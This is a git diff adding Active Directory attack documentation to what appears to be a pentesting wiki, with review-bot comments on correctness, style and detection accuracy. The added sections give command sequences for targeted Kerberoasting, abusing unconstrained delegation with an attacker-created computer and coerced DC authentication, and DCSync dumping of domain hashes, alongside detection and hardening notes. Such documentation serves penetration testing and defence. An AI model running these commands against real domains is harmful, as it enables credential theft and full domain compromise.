diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md index 02c665fed..4a2d8d1f0 100644 --- a/src/windows-hardening/active-directory-methodology/dcsync.md +++ b/src/windows-hardening/active-directory-methodology/dcsync.md @@ -35,6 +35,24 @@ secretsdump.py -just-dc :@ -outputfile dcsync_hashes [-history] #To dump password history, may be helpful for offline password cracking ``` +### DCSync using a captured DC machine TGT (ccache) + +In unconstrained-delegation export-mode scenarios, you may capture a Domain Controller machine TGT (e.g., `DC1$@DOMAIN` for `krbtgt@DOMAIN`). You can then use that ccache to authenticate as the DC and perform DCSync without a password. + +```bash +# Generate a krb5.conf for the realm (helper) +netexec smb --generate-krb5-file krb5.conf +sudo tee /etc/krb5.conf < krb5.conf + +# netexec helper using KRB5CCNAME +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + netexec smb --use-kcache --ntds + +# Or Impacket with Kerberos from ccache +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + secretsdump.py -just-dc -k -no-pass / -dc-ip +``` + `-just-dc` generates 3 files: - one with the **NTLM hashes** @@ -70,8 +88,6 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG - [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync) - [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/) +- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html {{#include ../../banners/hacktricks-training.md}} - - - 
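Review bot: in the first hunk of dcsync.md (`@@ -35,6 +35,24 @@`) the command arguments have lost their placeholders, so `netexec smb --use-kcache --ntds` has no target and `secretsdump.py -just-dc -k -no-pass / -dc-ip` ends in a bare `/` with nothing after `-dc-ip`; the angle-bracket tokens (domain, DC FQDN, DC IP) were evidently stripped as markup and need to be restored in a form the renderer keeps (quoted or backslash-escaped), otherwise the example cannot be followed. Two smaller points on the same hunk: `sudo tee /etc/krb5.conf < krb5.conf` silently overwrites the system Kerberos configuration, so either back it up first or point `KRB5_CONFIG` at the generated file to keep the change scoped to the session; and these three commands are repeated verbatim as step 6 of the unconstrained-delegation.md hunk below, so one copy should become a `{{#ref}}` cross-reference (the convention this tree already uses) so the two do not drift apart. Since the ccache here carries the DC's own identity (`DC1$@DOMAIN.TLD`), it would also be worth a sentence telling defenders that replication-GUID hits in Event ID 4662 must be correlated with the source host or IP, not just the requesting account name, because the account name alone looks legitimate in this scenario.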
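Review bot: in the second hunk of dcsync.md (`@@ -70,8 +88,6 @@`) the new reference uses a bare URL with an em-dash title while the two entries above it use the `[url](url)` form; match the existing list style so the references render consistently. The removal of the three trailing blank lines after the banner include is fine.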
diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md index b376acd3c..2e55528dd 100644 --- a/src/windows-hardening/active-directory-methodology/kerberoast.md +++ b/src/windows-hardening/active-directory-methodology/kerberoast.md 
@@ -155,6 +155,42 @@ Set-ADUser -Identity -Replace @{msDS-SupportedEncryptionTypes=4} Set-ADUser -Identity -Replace @{msDS-SupportedEncryptionTypes=28} ``` +#### Targeted Kerberoast via GenericWrite/GenericAll over a user (temporary SPN) + +When BloodHound shows that you have control over a user object (e.g., GenericWrite/GenericAll), you can reliably “targeted-roast” that specific user even if they do not currently have any SPNs: + +- Add a temporary SPN to the controlled user to make it roastable. +- Request a TGS-REP encrypted with RC4 (etype 23) for that SPN to favor cracking. +- Crack the `$krb5tgs$23$...` hash with hashcat. +- Clean up the SPN to reduce footprint. + +Windows (PowerView/Rubeus): + +```powershell +# Add temporary SPN on the target user +Set-DomainObject -Identity -Set @{serviceprincipalname='fake/TempSvc-'} -Verbose + +# Request RC4 TGS for that user (single target) +.\Rubeus.exe kerberoast /user: /nowrap /rc4 + +# Remove SPN afterwards +Set-DomainObject -Identity -Clear serviceprincipalname -Verbose +``` + +Linux one-liner (targetedKerberoast.py automates add SPN -> request TGS (etype 23) -> remove SPN): + +```bash +targetedKerberoast.py -d '' -u -p '' +``` + +Crack the output with hashcat autodetect (mode 13100 for `$krb5tgs$23$`): + +```bash +hashcat .hash /path/to/rockyou.txt +``` + +Detection notes: adding/removing SPNs produces directory changes (Event ID 5136/4738 on the target user) and the TGS request generates Event ID 4769. Consider throttling and prompt cleanup. + You can find useful tools for kerberoast attacks here: https://github.com/nidem/kerberoast If you find this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)` it’s due to local time skew. Sync to the DC: 
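Review bot: the cleanup step in this hunk, `Set-DomainObject -Identity -Clear serviceprincipalname`, clears every SPN on the user rather than only the `fake/TempSvc-` entry that was added; the text says the technique works "even if they do not currently have any SPNs", which implies some targets do have them, and for those the cleanup destroys the original values. Record the existing `serviceprincipalname` before the `-Set` and restore it afterwards instead of clearing the attribute. The detection note also needs a prerequisite: Event ID 5136 is only written when the Directory Service Changes audit subcategory is enabled and the object carries a matching SACL, which is not the default, whereas 4738 (user account changed) and 4769 are covered by the default DC audit policy; readers building detections should know which of the three they can rely on. Two minor items: the placeholders after `-Identity`, `/user:` and in `targetedKerberoast.py -d '' -u -p ''` have been stripped and the commands are not runnable as shown, and the `/rc4` switch on the Rubeus line should be checked against the SpecterOps Rubeus roasting documentation cited in the references, which documents the RC4-related options under different names.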
@@ -233,10 +269,12 @@ asreproast.md ## References +- [https://github.com/ShutdownRepo/targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled) - Microsoft Security Blog (2024-10-11) – Microsoft’s guidance to help mitigate Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/ - SpecterOps – Rubeus Roasting documentation: https://docs.specterops.io/ghostpack/rubeus/roasting +- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md index 41489d19a..fb29992d3 100644 --- a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md +++ b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md 
@@ -58,11 +58,109 @@ Find here other ways to **force an authentication:** printers-spooler-service-abuse.md {{#endref}} +### Abusing Unconstrained Delegation with an attacker-created computer + +Modern domains often have `MachineAccountQuota > 0` (default 10), allowing any authenticated principal to create up to N computer objects. If you also hold the `SeEnableDelegationPrivilege` token privilege (or equivalent rights), you can set the newly created computer to be trusted for unconstrained delegation and harvest inbound TGTs from privileged systems. + +High-level flow: + +1) Create a computer you control + +```bash +# Impacket addcomputer.py (any authenticated user if MachineAccountQuota > 0) +addcomputer.py -computer-name -computer-pass '' -dc-ip /:'' +``` + +2) Make the fake hostname resolvable inside the domain + +```bash +# krbrelayx dnstool.py - add an A record for the host FQDN to point to your listener IP +python3 dnstool.py -u '\\$' -p '' \ + --action add --record . --type A --data \ + -dns-ip +``` + +3) Enable Unconstrained Delegation on the attacker-controlled computer + +```bash +# Requires SeEnableDelegationPrivilege (commonly held by domain admins or delegated admins) +# BloodyAD example +bloodyAD -d -u -p '' --host add uac '$' -f TRUSTED_FOR_DELEGATION +``` + +Why this works: with unconstrained delegation, the LSA on a delegation-enabled computer caches inbound TGTs. If you trick a DC or privileged server to authenticate to your fake host, its machine TGT will be stored and can be exported. 
+ +4) Start krbrelayx in export mode and prepare the machine NT hash + +```bash +# Compute NT hash (MD4 over UTF-16LE) of the machine account password +python3 - << 'PY' +password = '' +import hashlib +print(hashlib.new('md4', password.encode('utf-16le')).hexdigest()) +PY +# Launch krbrelayx to export any inbound TGTs +python3 krbrelayx.py -hashes : +``` + +5) Coerce authentication from the DC/servers to your fake host + +```bash +# netexec (CME fork) coerce_plus module supports multiple coercion vectors +# Common options: METHOD=PrinterBug|PetitPotam|DFSCoerce|MSEven +netexec smb -u '$' -p '' -M coerce_plus -o LISTENER=. METHOD=PrinterBug +``` + +krbrelayx will save ccache files when a machine authenticates, for example: + +``` +Got ticket for DC1$@DOMAIN.TLD [krbtgt@DOMAIN.TLD] +Saving ticket in DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache +``` + +6) Use the captured DC machine TGT to perform DCSync + +```bash +# Create a krb5.conf for the realm (netexec helper) +netexec smb --generate-krb5-file krb5.conf +sudo tee /etc/krb5.conf < krb5.conf + +# Use the saved ccache to DCSync (netexec helper) +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + netexec smb --use-kcache --ntds + +# Alternatively with Impacket (Kerberos from ccache) +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + secretsdump.py -just-dc -k -no-pass / -dc-ip +``` + +Notes and requirements: + +- `MachineAccountQuota > 0` enables unprivileged computer creation; otherwise you need explicit rights. +- Setting `TRUSTED_FOR_DELEGATION` on a computer requires `SeEnableDelegationPrivilege` (or domain admin). +- Ensure name resolution to your fake host (DNS A record) so the DC can reach it by FQDN. +- Coercion requires a viable vector (PrinterBug/MS-RPRN, EFSRPC/PetitPotam, DFSCoerce, MS-EVEN, etc.). Disable these on DCs if possible. 
+ +Detection and hardening ideas: + +- Alert on Event ID 4741 (computer account created) and 4742/4738 (computer/user account changed) when UAC `TRUSTED_FOR_DELEGATION` is set. +- Monitor for unusual DNS A-record additions in the domain zone. +- Watch for spikes in 4768/4769 from unexpected hosts and DC-authentications to non-DC hosts. +- Restrict `SeEnableDelegationPrivilege` to a minimal set, set `MachineAccountQuota=0` where feasible, and disable Print Spooler on DCs. Enforce LDAP signing and channel binding. + ### Mitigation - Limit DA/Admin logins to specific services - Set "Account is sensitive and cannot be delegated" for privileged accounts. -{{#include ../../banners/hacktricks-training.md}} +## References +- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html +- harmj0y – S4U2Pwnage: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ +- ired.team – Domain compromise via unrestricted delegation: https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation +- krbrelayx: https://github.com/dirkjanm/krbrelayx +- Impacket addcomputer.py: https://github.com/fortra/impacket +- BloodyAD: https://github.com/CravateRouge/bloodyAD +- netexec (CME fork): https://github.com/Pennyw0rth/NetExec +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file
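Review bot: in the kerberoast.md references hunk (`@@ -233,10 +269,12 @@`) the list now mixes `[url](url)` entries with bare-URL entries carrying em-dash titles; pick one form for the whole list. The same HTB line is added to three files in this patch, which is fine, but keep the title text identical across them so a later edit does not leave them inconsistent.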
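Review bot: in the unconstrained-delegation.md hunk (`@@ -58,11 +58,109 @@`), step 4's NT-hash snippet `hashlib.new('md4', ...)` raises `ValueError: unsupported hash type md4` on Python builds linked against OpenSSL 3 unless the legacy provider is enabled, so it fails on current distributions; since Impacket is already required by this section (`addcomputer.py`, `secretsdump.py`), `impacket.ntlm.compute_nthash(password).hex()` is a portable replacement. The same step passes `-hashes :` with both halves missing, and steps 1, 2, 3, 5 and 6 have likewise lost their placeholders (`-computer-name -computer-pass ''`, `--record . --type A --data`, `--host add uac '$'`, `LISTENER=.`, `secretsdump.py ... / -dc-ip`), so none of the commands are runnable as shown. Step 6 repeats the dcsync.md block verbatim; replace it with a `{{#ref}}` to dcsync.md as the tree does elsewhere. In "Detection and hardening ideas", the 4742 bullet should name the field that changes so a rule can be written against it (the User Account Control field reports "Trusted For Delegation" being enabled), and "Enforce LDAP signing and channel binding" does not follow from the flow described, which is coercion into a Kerberos TGT capture rather than an LDAP relay; either explain the connection or drop it. Finally, the new hardening list and the existing "Mitigation" section now overlap (both cover restricting privileged accounts from delegation); merge them into one section, and note there that the "Account is sensitive and cannot be delegated" setting already listed is the per-account control that prevents the captured TGT from being usable for delegation in the first place.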